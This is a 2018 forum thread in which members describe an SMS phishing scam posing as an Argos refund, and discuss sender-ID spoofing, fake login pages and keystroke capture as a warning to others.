Argos refund!, phishing scam |
Argos refund!, phishing scam |
Sat, 3 Feb 2018 - 08:48
Post
#1
|
|
Member Group: Members Posts: 882 Joined: 7 Nov 2004 Member No.: 1,847 |
Had a text from Argos (it stacked under Argos, along with the "your order is ready for collection" texts- which is a bit odd...)
Apparently, I have a refund due of £180! Obvious scam, as if Argos ever sell anything for £180 why didn't they put £179.99 or something* The link takes me to a page that looks exactly like the Argos log-in, (except none of the hot links to store finder etc work) and when I logged in, somehow guessing Ivor.Biggun's password, I am asked to enter card numbers, security code, mothers maiden name, address, DOB ......... Do people seriously fall for this?? I suppose 1 in 1000 would do nicely. On a serious note, why did it stack up with kosher Argos texts, is there a sender flag that they are spoofing in an SMS message? * The one from the DVLA last week was much more believable, my refund is £48.73 or something, I wonder how long it will take to come? (They wanted my bank account number, card security number and my mother's maiden name too, seems a bit OTT when they always refund by cheque, in the hope that you will be unable to find a "bank" that is still open........ ) This post has been edited by facade: Sat, 3 Feb 2018 - 08:50 |
|
|
Advertisement |
Sat, 3 Feb 2018 - 08:48
Post
#
|
Advertise here! |
|
|
|
Sat, 3 Feb 2018 - 08:56
Post
#2
|
|
Member Group: Members Posts: 41,505 Joined: 25 Aug 2011 From: Planet Earth Member No.: 49,223 |
...and when I logged in, somehow guessing Ivor.Biggun's password, I usually leave choice words too but I suspect the humour will be lost on the recipient. (I can picture them frantically trying to logon as Ivor) -------------------- RK=Registered Keeper, OP=Original Poster (You!), CoFP=Conditional Offer of Fixed Penalty, NtK=Notice to Keeper, NtD=Notice to Driver
PoFA=Protection of Freedoms Act, SAC=Safety Awareness Course, NIP=Notice of Intended Prosecution, ADR=Alternative Dispute Resolution PPC=Private Parking Company, LBCCC=Letter Before County Court Claim, PII=Personally Identifiable Information, SAR=Subject Access Request Private Parking - remember, they just want your money and will say almost anything to get it. |
|
|
Sat, 3 Feb 2018 - 09:05
Post
#3
|
|
Member Group: Members Posts: 4,126 Joined: 31 Jan 2018 Member No.: 96,238 |
Is it illegal to provide the details of parking company bank accounts along with their directors' details ?
|
|
|
Sat, 3 Feb 2018 - 09:05
Post
#4
|
|
Member Group: Members Posts: 882 Joined: 7 Nov 2004 Member No.: 1,847 |
I wouldn't ever have clicked the links on the PC (probably Kaspersky would have stopped me, along with passing my every keystroke to Russia...)
But on my ancient iphone 4, I'm never going to do anything secure or plug it into the PC, and I was curious.... |
|
|
Sat, 3 Feb 2018 - 10:07
Post
#5
|
||||
Webmaster Group: Root Admin Posts: 8,205 Joined: 30 Mar 2003 From: Wokingham, UK Member No.: 2 |
On a serious note, why did it stack up with kosher Argos texts, is there a sender flag that they are spoofing in an SMS message? All they have to do is spoof the Caller ID so that it matches Argos' - it's trivial. There's no authentication built in to SMS messaging; it was designed in more innocent times, and certainly nobody imagined it being used for critical purposes such as 2FA. I usually leave choice words too but I suspect the humour will be lost on the recipient. (I can picture them frantically trying to logon as Ivor) I doubt they care, or even notice as exploitation of the information is doubtless automated. Providing obviously bogus details may even help them; there's a school of thought that phishing emails are deliberately made obvious to screen out the people who won't fall for subsequent steps in the scam, and so concentrate the pool of victims. -------------------- Regards,
Fredd __________________________________________________________________________
|
|||
|
||||
Sat, 3 Feb 2018 - 10:15
Post
#6
|
|
Member Group: Members Posts: 25,726 Joined: 28 Jun 2010 From: Area 51 Member No.: 38,559 |
....... Providing obviously bogus details may even help them; there's a school of thought that phishing emails are deliberately made obvious to screen out the people who won't fall for subsequent steps in the scam, and so concentrate the pool of victims. It's certainly true the other way, even with begging emails let alone phishing. Be seen as gullible, earmarked as one of the sheep to be sheared. |
|
|
Sat, 3 Feb 2018 - 10:17
Post
#7
|
|
Member Group: Members Posts: 1,333 Joined: 28 Mar 2014 From: Corby Member No.: 69,758 |
Do people seriously fall for this?? I suppose 1 in 1000 would do nicely. A colleague's wife did this, except didn't hit enter. DOB, NI, credit card, bank account, everything. There were fears that that logging took place on data entry (as opposed to when you hit enter) but so far nothing has been stolen |
|
|
Sat, 3 Feb 2018 - 12:27
Post
#8
|
|
Member Group: Members Posts: 38,006 Joined: 3 Dec 2010 Member No.: 42,618 |
In the past I've found these websites are hosted on hacked legitimate website, and if you notify the owner of the legitimate website they take it down pretty quickly.
-------------------- If you would like assistance with a penalty charge notice, please post a thread on https://www.ftla.uk/index.php
|
|
|
Sat, 3 Feb 2018 - 17:32
Post
#9
|
|
Member Group: Members Posts: 28,931 Joined: 29 Nov 2005 Member No.: 4,323 |
Do people seriously fall for this?? I suppose 1 in 1000 would do nicely. A colleague's wife did this, except didn't hit enter. DOB, NI, credit card, bank account, everything. There were fears that that logging took place on data entry (as opposed to when you hit enter) but so far nothing has been stolen Stay alert on it, it is a valid fear. javascript can send back your tying in a web page on the fly. -------------------- Which facts in any situation or problem are “essential” and what makes them “essential”? If the “essential” facts are said to depend on the principles involved, then the whole business, all too obviously, goes right around in a circle. In the light of one principle or set of principles, one bunch of facts will be the “essential” ones; in the light of another principle or set of principles, a different bunch of facts will be “essential.” In order to settle on the right facts you first have to pick your principles, although the whole point of finding the facts was to indicate which principles apply.
Note that I am not legally qualified and any and all statements made are "Reserved". Liability for application lies with the reader. |
|
|
Sun, 4 Feb 2018 - 11:33
Post
#10
|
|
Member Group: Members Posts: 1,333 Joined: 28 Mar 2014 From: Corby Member No.: 69,758 |
Do people seriously fall for this?? I suppose 1 in 1000 would do nicely. A colleague's wife did this, except didn't hit enter. DOB, NI, credit card, bank account, everything. There were fears that that logging took place on data entry (as opposed to when you hit enter) but so far nothing has been stolen Stay alert on it, it is a valid fear. javascript can send back your tying in a web page on the fly. Indeed, the only reason I know about this was because the worried colleague wanted me to look into the webpage to see what was happening but unfortunately it had been taken down before I had the chance. |
|
|
Lo-Fi Version | Time is now: Thursday, 28th March 2024 - 15:09 |